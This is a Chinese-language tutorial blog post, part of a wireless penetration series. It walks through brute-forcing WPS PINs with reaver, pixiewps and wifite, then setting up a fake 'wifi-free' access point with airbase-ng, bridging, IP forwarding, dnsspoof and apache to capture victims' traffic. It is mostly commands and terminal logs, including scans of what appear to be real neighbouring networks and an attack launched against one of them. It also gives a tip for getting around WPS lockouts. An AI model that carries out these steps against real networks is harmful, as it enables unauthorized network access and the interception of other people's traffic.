• 无线渗透(六)WPS、伪造AP


    WPS (WIRELESS PROTECTED SETUP)
    WPS是WiFi联盟2006年开放的一项技术
    通过PIN码来简化无线接入的操作,无需记住PSK
    路由器和网卡各按一个按钮就能接入无线
    PIN码是分为前后各4位的2段共8位数字
    安全漏洞
    2011年被发现安全涉及漏洞
    接入发起方可以根据路由器的返回信息判断前4位是否正确
    而PIN码的后4位只有1000中定义的组合(最后一位是checksum)
    所以全部穷举破解只需要11000次尝试
    PSK: 218,340,105,584,896
    标准本身没有设计锁定机制,目前多个厂商已实现锁定机制
    WPS (WIRELESS PROTECTED SETUP)
    包括Linksys在内的很多厂家的无线路由器无法关闭WPS功能
    即使在WEB节目中有关闭WPS,配置也不会生效
    攻击难度相对较低,防御却十分困难
    理论上可在4-10小时爆破密码(实际15-20小时)
    PSK
    早期某些厂家的AP用计算器直接算出PIN
    C83A35
    00B00C
    WPS (WIRELESS PROTECTED SETUP)
    启动侦听模式后,发现支持WPS的AP
    wash -i wlan0mon
    airodump-ng wlan0mon –wps
    爆破PIN码
    reaver -i wlan0mon -b <AP mac> -vv
    秒破PIN码
    reaver -i wlan0mon -b <AP mac> -vv -K 1
    pixiewps
    只适用于固定厂商的芯片,成功率很低
    reaver -i wlan0mon -b <AP mac> -vv -p 88888888
    root@kali:~# wash -i wlan0mon
    BSSID Ch dBm WPS Lck Vendor ESSID
    ——————————————————————————–
    40:31:3C:FD:BE:D2 1 -87 2.0 No RalinkTe Xiaomi_BED1
    00:1F:8F:90:AB:69 11 -87 1.0 No Broadcom ChinaNet-cVUF
    98:BC:57:76:36:7A 13 -93 2.0 No RalinkTe ChinaNGB-YdMeY4
    root@kali:~# airodump-ng wlan0mon –wps
    CH 14 ][ Elapsed: 1 min ][ 2019-03-08 23:54
    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH WPS
    D8:B0:4C:C3:25:E0 -69 39 0 0 11 65 WPA2 CCMP PSK 0.0
    D4:EE:07:67:22:90 -72 37 62 0 8 270 WPA2 CCMP PSK
    00:BE:9E:2E:E5:ED -79 39 0 0 2 130 WPA2 CCMP PSK 0.0
    D0:76:E7:51:2A:78 -85 39 8 0 1 270 WPA2 CCMP PSK 0.0
    00:1F:8F:90:AB:69 -86 30 0 0 11 130 WPA2 CCMP PSK 1.0
    98:BC:57:76:36:7A -88 5 0 0 13 270 WPA2 CCMP PSK 2.0
    D4:EE:07:54:4F:A8 -87 2 0 0 1 130 WPA2 CCMP PSK 0.0
    94:D9:B3:93:DF:45 -88 11 0 0 1 405 WPA2 CCMP PSK 0.0
    9C:A5:25:11:FB:C8 -86 15 0 0 11 65 WPA2 CCMP PSK 0.0
    BSSID STATION PWR Rate Lost Frames Probe
    D4:EE:07:67:22:90 A4:50:46:E0:FA:06 -34 0 – 1e 2 62
    D4:EE:07:67:22:90 D4:A1:48:4B:96:F6 -84 0 – 6 0 1
    D4:EE:07:67:22:90 5C:F5:DA:E2:35:A6 -1 0e- 0 0 28
    D4:EE:07:67:22:90 20:16:B9:33:38:F3 -26 0 -12e 0 1
    (not associated) 34:13:E8:98:B9:3A -86 0 – 1 0 1
    (not associated) DA:A1:19:DA:31:95 -88 0 – 1 0 3 BOSZJOA
    root@kali:~# reaver -i wlan0mon -b 00:1F:8F:90:AB:69 -vv -c 11
    Reaver v1.6.5 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    [+] Switching wlan0mon to channel 11
    [+] Waiting for beacon from 00:1F:8F:90:AB:69
    [+] Received beacon from 00:1F:8F:90:AB:69
    [+] Vendor: Broadcom
    [+] Trying pin “12345670”
    [+] Sending authentication request
    [!] Found packet with bad FCS, skipping…
    [+] Sending association request
    [+] Associated with 00:1F:8F:90:AB:69 (ESSID: ChinaNet-cVUF)
    [+] Sending EAPOL START request
    root@kali:~# ifconfig wlan0mon down
    root@kali:~# ifconfig wlan0mon up
    root@kali:~# reaver -i wlan0mon -b 14:75:90:21:4F:56 -vv -c 11
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
    [+] Switching wlan0mon to channel 11
    [?] Restore previous session for 14:75:90:21:4F:56? [n/Y]
    [+] Waiting for beacon from 14:75:90:21:4F:56
    [+] Associated with 14:75:90:21:4F:56 (ESSID: TP_LINK_4F56)
    [+] Starting Cracking Session.Pin count:0, Max pin attempts: 11000
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] WARNING: Receive timeout occurred
    root@kali:~# service network-manager stop
    root@kali:~# airmon-ng check kill
    Killing these processes:
    PID Name
    765 dhclient
    988 wpa_supplicant
    root@kali:~# airmon-ng start wlan0mon
    No interfering processes found
    PHY Interface Driver Chipset
    phy0 wlan0 rt2800usb Ralink Technology, Corp. RT5370
    (mac80211 monitor mode vif enable for [phy0]wlan0 on [phy0]wlan0mon)
    (mac80211 station mode vif disabled for [phy0]wlan0)
    root@kali:~# wash -i wlan0mon
    Wash v1.5.2 WiFi Protected Setup Scan Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
    root@kali:~# reaver -i wlan0mon -b 40:31:3C:FD:BE:D2 -vv -K 1
    # -K 尝试漏洞破解密码
    WPS (WIRELESS PROTECTED SETUP)
    问题:
    很多厂家实现了锁定机制,所以爆破时应注意限速
    一旦触发锁定,可尝试耗尽AP连接数,令其重启并解除WPS锁定
    综合自动化无线密码破解工具wifite
    root@kali:~# wifite
    . .
    .´ · . . · `. wifite 2.2.5
    : : : (¯) : : : automated wireless auditor
    `. · ` /¯ ´ · .´ https://github.com/derv82/wifite2
    ` /¯¯¯ ´
    [!] Warning: Recommended app hcxdumptool was not found. install @ https://github.com/ZerBea/hcxdumptool
    [!] Warning: Recommended app hcxpcaptool was not found. install @ https://github.com/ZerBea/hcxtools
    [+] Using wlan0mon already in monitor mode
    NUM ESSID CH ENCR POWER WPS? CLIENT
    — ————————- — —- —– —- ——
    1 ziroom401 8 WPA 29db no
    2 (D8:B0:4C:C3:25:E0) 11 WPA 27db no
    3 ChinaNet-9gzV 2 WPA 19db no
    4 ziroom501 1 WPA 17db no
    5 zxx 1 WPA 14db no
    6 ziroom102 1 WPA 14db no
    7 Xiaomi_BED1 1 WPA 13db yes
    8 ChinaNet-cVUF 11 WPA 12db yes
    9 (9C:A5:25:11:FB:C8) 11 WPA 12db no
    [+] select target(s) (1-9) separated by commas, dashes or all: 7
    [+] (1/1) Starting attacks against 40:31:3C:FD:BE:D2 (Xiaomi_BED1)
    [+] Xiaomi_BED1 (14db) WPS Pixie-Dust: [4m27s] Initializing (Timeouts:2) ^C
    [!] Interrupted
    [+] 3 attack(s) remain
    WPS及其他工具
    root@kali:~# service network-manager stop
    root@kali:~# airmon-ng check kill
    Killing these processes:
    PID Name
    765 dhclient
    988 wpa_supplicant
    先打上面的两个命令,把网卡映射到虚拟机,记住这个顺序
    root@kali:~# ifconfig //看不到网卡
    root@kali:~# ifconfig -a //必须运作ifconfig -a 才可以看到网卡
    root@kali:~# airmon-ng start wlan2
    Found 2 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    PID Name
    1672 avahi-daemon
    1673 avahi-daemon
    PHY Interface Dirver Chipset
    phy0 wlan2 ath9k_htc Atheros Communications, Inc . AR9271 802.11
    (mac80211 monitor mode vif enbale for [phy0]wlan2 on [phy0]wlan2mon)
    (mac80211 station mode vif disbale for [phy0]wlan2)
    root@kali:~# iwconfig
    eth0 no wireless extensions.
    wlan2mon IEE 802.11bgn Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm
    Retry short limit:7 RTS thr:off Fragment thr:off
    Power Management:off
    lo no wireless extensions.
    root@kali:~# wash
    Wash v1.6.5 WiFi Protected Setup Scan Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
    Required Arguments:
    -i, –interface=<iface> Interface to capture packets on
    -f, –file [FILE1 FILE2 FILE3 …] Read packets from capture files
    Optional Arguments:
    -c, –channel=<num> Channel to listen on [auto]
    -n, –probes=<num> Maximum number of probes to send to each AP in scan mode [15]
    -F, –ignore-fcs Ignore frame checksum errors
    -2, –2ghz Use 2.4GHz 802.11 channels
    -5, –5ghz Use 5GHz 802.11 channels
    -s, –scan Use scan mode
    -u, –survey Use survey mode [default]
    -a, –all Show all APs, even those without WPS
    -j, –json print extended WPS info as json
    -U, –utf8 Show UTF8 ESSID (does not sanitize ESSID, dangerous)
    -h, –help Show help
    Example:
    wash -i wlan0mon
    root@kali:~# wash -i wlan0mon
    BSSID Ch dBm WPS Lck Vendor ESSID
    ——————————————————————————–
    40:31:3C:FD:BE:D2 1 -89 2.0 No RalinkTe Xiaomi_BED1
    00:1F:8F:90:AB:69 11 -85 1.0 No Broadcom ChinaNet-cVUF
    98:BC:57:76:36:7A 13 -89 2.0 No RalinkTe ChinaNGB-YdMeY4
    root@kali:~# reaver -i wlan0mon -b 40:31:3C:FD:BE:D2 -vv -K 1
    root@kali:~# reaver -i wlan0mon -b 40:31:3C:FD:BE:D2 -vv # 开始11000次 pin码尝试
    root@kali:~# pixiewps
    Pixiewps 1.4 WPS pixie-dust attack tool
    Copyright (c) 2015-2017, wiire <wi7ire@gmail.com>
    Usage: pixiewps <arguments>
    Required arguments:
    -e, –pke : Enrollee public key
    -r, –pkr : Registrar public key
    -s, –e-hash1 : Enrollee hash-1
    -z, –e-hash2 : Enrollee hash-2
    -a, –authkey : Authentication session key
    -n, –e-nonce : Enrollee nonce
    Optional arguments:
    -m, –r-nonce : Registrar nonce
    -b, –e-bssid : Enrollee BSSID
    -v, –verbosity : Verbosity level 1-3, 1 is quietest [3]
    -o, –output : Write output to file
    -j, –jobs : Number of parallel threads to use [Auto]
    -h : Display this usage screen
    –help : Verbose help and more usage examples
    -V, –version : Display version
    –mode N[,… N] : Mode selection, comma separated [Auto]
    –start [mm/]yyyy : Starting date (only mode 3) [+1 day]
    –end [mm/]yyyy : Ending date (only mode 3) [-1 day]
    -f, –force : Bruteforce full range (only mode 3)
    Miscellaneous arguments:
    -7, –m7-enc : Recover encrypted settings from M7 (only mode 3)
    -5, –m5-enc : Recover secret nonce from M5 (only mode 3)
    Example (use –help for more):
    pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
    root@kali:~# reaver -i wlan0mon -b 00:90:4C:C1:AC:21 -vv -K 1
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
    [+] Waiting for beacn from 00:90:4C:C1:AC:21
    [+] Switching wlan0mon to channel 1
    [+] Switching wlan0mon to channel 2
    ^C
    [+] Nothing done, nothing to save.
    root@kali:~# reaver -i wlan0mon -b 00:90:4C:C1:AC:21 -vv -p 52737488 -c 1
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
    [+] Switching wlan0mon to channel 1
    [+] Switching wlan0mon to channel 2
    ^C
    [+] Nothing done, nothing to save.
    EVIL TWIN AP / ROGUE AP
    其他工具
    WPS (WIRELESS PROTECTED SETUP)
    蹭网与被蹭网
    北上广20%的公共场所无线网络是伪造的
    WPS (WIRELESS PROTECTED SETUP)
    airbase-ng -a <AP mac> –essid “kifi” -c 11 wlan2mon
    apt-get install bridge-Utils 安装网桥
    brctl addbr bridge
    brctl addif Wifi-Bridge eth0
    brctl addif Wifi-Bridge at0
    ifconfig eth0 0.0.0.0 up
    ifconfig at0 0.0.0.0 up
    ifconfig bridge 192.168.1.10 up
    route add -net 0.0.0.0 netmask 0.0.0.0 gw 192.168.1.1
    root@kali:~# airodump-ng wlan0mon
    CH 5 ][ Elapsed: 54 s ][ 2019-03-09 00:58
    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
    D8:B0:4C:C3:25:E0 -70 20 0 0 11 65 WPA2 CCMP PSK <leng
    D4:EE:07:67:22:90 -77 22 1 0 8 270 WPA2 CCMP PSK ziroo
    00:BE:9E:2E:E5:ED -78 18 0 0 2 130 WPA2 CCMP PSK China
    D0:76:E7:51:2A:78 -84 19 0 0 1 270 WPA2 CCMP PSK ziroo
    9C:A5:25:11:FB:C8 -86 14 0 0 11 65 WPA2 CCMP PSK <leng
    00:1F:8F:90:AB:69 -88 16 0 0 11 130 WPA2 CCMP PSK China
    D4:EE:07:54:4F:A8 -88 4 0 0 1 130 WPA2 CCMP PSK zxx
    40:31:3C:FD:BE:D2 -86 2 0 0 1 130 WPA2 CCMP PSK Xiaom
    BSSID STATION PWR Rate Lost Frames Probe
    D4:EE:07:67:22:90 D4:A1:48:4B:96:F6 -1 2e- 0 0 1
    D4:EE:07:67:22:90 20:16:B9:33:38:F3 -26 0 – 6e 0 5
    D4:EE:07:67:22:90 A4:50:46:E0:FA:06 -48 0 – 1e 13 4
    root@kali:~# airbase-ng -c 11 –essid wifi-free wlan0mon # 伪造wifi-free无线网络
    01:00:44 Created tap interface at0
    01:00:44 Trying to set MTU on at0 to 1500
    01:00:44 Trying to set MTU on wlan0mon to 1800
    01:00:45 Access Point with BSSID 00:02:6F:BE:66:41 started.
    root@kali:~# ifconfig -a # 出现了at0伪造网卡
    root@kali:~# airodump-ng wlan0mon # 再侦听一下,出现了wifi-free无线网络
    CH 7 ][ Elapsed: 37 s ][ 2019-03-09 01:03
    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
    00:02:6F:BE:66:41 0 480 0 0 7 54 OPN wifi-free
    D4:EE:07:67:22:90 -72 13 3 0 8 270 WPA2 CCMP PSK ziroom401
    D8:B0:4C:C3:25:E0 -73 13 0 0 11 65 WPA2 CCMP PSK <length:
    00:BE:9E:2E:E5:ED -80 12 0 0 2 130 WPA2 CCMP PSK ChinaNet-
    D0:76:E7:51:2A:78 -85 15 0 0 1 270 WPA2 CCMP PSK ziroom501
    D4:EE:07:54:4F:A8 -85 6 0 0 1 130 WPA2 CCMP PSK zxx
    9C:A5:25:11:FB:C8 -86 13 0 0 11 65 WPA2 CCMP PSK <length:
    00:1F:8F:90:AB:69 -87 11 0 0 11 130 WPA2 CCMP PSK ChinaNet-
    BSSID STATION PWR Rate Lost Frames Probe
    (not associated) 40:E2:30:CD:AB:C3 -76 0 – 1 0 1
    (not associated) 34:13:E8:98:B9:3A -84 0 – 1 0 1
    D4:EE:07:67:22:90 A4:50:46:E0:FA:06 -46 0 – 1e 0 14
    D4:EE:07:67:22:90 DC:F0:90:8B:A1:A6 -58 0 – 6 0 1
    root@kali:~# apt-get install bridge-utils # 安装网桥
    root@kali:~# brctl
    Usage: brctl [commands]
    commands:
    addbr <bridge> add bridge
    delbr <bridge> delete bridge
    addif <bridge> <device> add interface to bridge
    delif <bridge> <device> delete interface from bridge
    hairpin <bridge> <port> {on|off} turn hairpin on/off
    setageing <bridge> <time> set ageing time
    setbridgeprio <bridge> <prio> set bridge priority
    setfd <bridge> <time> set bridge forward delay
    sethello <bridge> <time> set hello time
    setmaxage <bridge> <time> set max message age
    setpathcost <bridge> <port> <cost> set path cost
    setportprio <bridge> <port> <prio> set port priority
    show [ <bridge> ] show a list of bridges
    showmacs <bridge> show a list of mac addrs
    showstp <bridge> show bridge stp info
    stp <bridge> {on|off} turn stp on/off
    root@kali:~# brctl addbr bridge
    root@kali:~# brctl addif bridge eth0
    # 此处需要将kali网络改为主机模式
    root@kali:~# dhclient eth0
    root@kali:~# brctl addif bridge eth0
    root@kali:~# brctl addif bidge at0
    root@kali:~# ifconfig eth0 0.0.0.0 up
    root@kali:~# ifconfig at0 0.0.0.0 up
    root@kali:~# ifconfig bridge 10.1.1.101
    root@kali:~# netstat -ar
    Kernel IP routing table
    Destination Gateway Genmask Flags MSS Window irtt Iface
    0.0.0.0 10.1.1.1 0.0.0.0 UG 0 0 0 bridge
    root@kali:~# route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.1.1.1
    root@kali:~# netstat -ar
    Kernel IP routing table
    Destination Gateway Genmask Flags MSS Window irtt Iface
    0.0.0.0 10.1.1.1 0.0.0.0 UG 0 0 0 bridge
    10.0.0.0 10.1.1.1 255.0.0.0 U 0 0 0 bridge
    WPS (WIRELESS PROTECTED SETUP)
    echo 1 > /proc/sys/net/ipv4/ip_forward
    dnspoof -i bridge -f dnsspoof.hosts ┃
    /usr/share/dnsiff/dnsspoof.hosts ┃
    ┃apachet2ctl start ┃
    ╋━━━━━━━━━━━━━━━━━━━╋
    root@kali:~# vim /proc/sys/net/ipv4/ip_forward
    不让修改数据!
    # 开启ip转发功能
    root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward
    root@kali:~# cat /proc/sys/net/ipv4/ip_forward
    1
    root@kali:~# dnsspoof -i bridge -f dnsspoof.hosts
    root@kali:~# cat /etc/hosts
    127.0.0.1 localhost
    127.0.1.1 kali
    # The following lines are desirable for IPv6 capable hosts
    ::1 localhost ip6-localhost ip6-loopback
    ff02::1 ip6-allnodes
    ff02::2 ip6-allrouters
    root@kali:~# cat /usr/share/dnsiff/dnsspoof.hosts
    root@kali:~# vim host
    root@kali:~# dnsspoof -i bridge -f host
    root@kali:~# apache
    apache2 apache2ctl apachectl apache-users
    root@kali:~# apachet2ctl start
    AH00558: apache2: Coule not reliably determine the Server’s fully qualified domain name, using 127.0.1.l.Set the ‘ServerName’ directive globally to suppress this message
    root@kali:~# netstat -pantu | grep :80
    tcp6 0 0 :::80 :::* LISTEN 2941/apache2
  • 相关阅读:
    centos 查看版本(转)
    防火墙内设置FileZilla Server注意事项
    mycat读写分离与主从切换
    用mycat做读写分离:基于 MySQL主从复制
    mysql处理海量数据时的一些优化查询速度方法
    CentOS下LVS DR模式负载均衡配置详解
    Linux清除arp缓存
    扫描局域网内所有主机和MAC地址的Shell脚本
    Windows+Python 3.6环境下安装PyQt4
    Python 爬虫-豆瓣读书
  • 原文地址:https://www.cnblogs.com/micr067/p/12519788.html
Copyright © 2020-2023  润新知